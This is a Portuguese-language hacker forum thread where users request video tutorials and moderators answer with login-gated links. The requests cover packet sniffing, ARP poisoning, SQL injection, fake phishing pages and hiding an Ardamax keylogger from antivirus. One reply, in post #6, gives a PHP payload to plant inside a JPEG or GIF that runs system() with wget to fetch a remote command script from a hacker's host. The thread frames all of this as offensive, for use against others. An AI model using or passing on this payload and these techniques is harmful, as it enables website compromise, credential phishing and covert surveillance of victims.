Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Peça sua vídeo aula

Collapse
This is a sticky topic.
X
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Importante Peça sua vídeo aula

    Pessoal, reconstruído o tópico de pedidos de vídeo aulas...

    Agora todos os pedidos serão atendidos em um prazo de no máximo 15 dias.

    Pessoal que quiser ajudar, vão ser muito bem vindos também

    OBS: procure fazer pedidos mais específicos, não pegar um conteúdo que englobe muita coisa junto.
    Como por exemplo o pessoal que gosta de pedir métodos de testes penetração (entre outros).. Tente pedir como usar determinado de método...

    Continua o mesmo modo de pedido..
    Exemplo:
    Vídeo: Sql injetcion
    OBS: Se possível com áudio
    Pessoal, siga @sirbagda e fique sempre atualizado com materias, videos e afins do mundo hacker.

    Similar Threads

  • Font Size
    #2
    Bem, gostaria de uma video aula real de como usar sniffers, e a hora que eles capturam pacotes... entre outras, se possivel com audio sim
    sigpic

    Comment


    • Font Size
      #3
      Video: Upar shell em jpeg , gif
      Se possivel com audio, ou talvez nao precise e tbm de como rodar exploits em php, quais programas necessarios

      Comment


      • Font Size
        #4
        Postado Originalmente por Cup1m Ver Post
        Bem, gostaria de uma video aula real de como usar sniffers, e a hora que eles capturam pacotes... entre outras, se possivel com audio sim
        O atila arresem postou aqui :B
        Baixei a vídeo para dar uma olhada.. Muito boa
        Fala sobre ARP Poisoning e DNS Spoofing com o Ettercap usando o Backtrack 4 em modo texto

        tá na mão: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
        Pessoal, siga @sirbagda e fique sempre atualizado com materias, videos e afins do mundo hacker.

        Comment


        • Font Size
          #5
          Gostei da iniciativa...

          FIXO!

          Comment


          • Font Size
            #6
            Postado Originalmente por Dork Ver Post
            Video: Upar shell em jpeg , gif
            Se possivel com audio, ou talvez nao precise e tbm de como rodar exploits em php, quais programas necessarios
            Primeiro Rodar Exploits em PHP
            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
            Segundo Upar shell em jpeg , gif
            Vídeo aula não foi criada por mim
            Link para download: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
            Quando extrair o arquivo vai ser um swf.. Abra no navegador

            Uma dica:
            O código que você pode usar na imagem pode ser:
            <? ob_clean(); system("wget http://www.sitedohacker.com.br/cmd.txt?"); die; ?>
            Espero que goste
            Pessoal, siga @sirbagda e fique sempre atualizado com materias, videos e afins do mundo hacker.

            Comment


            • Font Size
              #7
              Eu gostaria de uma video aula explicando como posso começar nesta área, falando um pouco sobre e etc.. ou que me recomendassem vídeos onde posse ver como comessar, por que parte, explicando um pouco e sobre a "primeira parte".. Muito obrigado.

              Comment


              • Font Size
                #8
                Gostaria de um vídeo com aúdio, e que me explicasse o começo, as informações basicas que necessito e que no final deixe um comentário falando por onde posso continuar e que caminho devo tomar. Obrigado

                Comment


                • Font Size
                  #9
                  OBS: procure fazer pedidos mais específicos, não pegar um conteúdo que englobe muita coisa junto.

                  Confere ai: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
                  Pessoal, siga @sirbagda e fique sempre atualizado com materias, videos e afins do mundo hacker.

                  Comment


                  • Font Size
                    #10
                    Video: Configurar internet no Backtrack 4
                    OBS: Se possivel com audio

                    Comment


                    • Font Size
                      #11
                      Boum SirBagda Queria saber ser tem como vc fazer uma video aula de como posso Criar uma Link Igual e este aqui >> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... << ele era usando pra CRIAR PAGINAS FAKE
                      tipo ja tenteii de todas a forma mais nada de consegui sou noob nesta parte dai vim aqui pedi ajuda a vcS
                      fico na espera de uma resp...
                      Msn: fernando@guiadohacker.com.br
                      Se gostou do post clique em OBRIGADO, Fez o Download COMENTEM



                      Comment


                      • Font Size
                        #12
                        Eu gostaria das video aulas da revista H4CK3R: curso de firewall
                        Eu tento manter meu código limpo, e você ?

                        Comment


                        • Font Size
                          #13
                          Vídeo: Sql injetcion AVANÇADO
                          OBS: Se possível com áudio

                          Comment


                          • Font Size
                            #14
                            Postado Originalmente por Bl4ck_boY Ver Post
                            Vídeo: Sql injetcion AVANÇADO
                            OBS: Se possível com áudio
                            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

                            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

                            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

                            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


                            []'
                            Last edited by #Expl0it; 19-12-2009, 15:59.
                            Mesmo longe, eu estou perto. Guia do Hacker 4ever.

                            Comment


                            • Font Size
                              #15
                              video aula de como deixa o server do ardamax kl indetectavel por antivirus
                              valeu
                              sigpic

                              Comment

                              X
                              Working...
                              X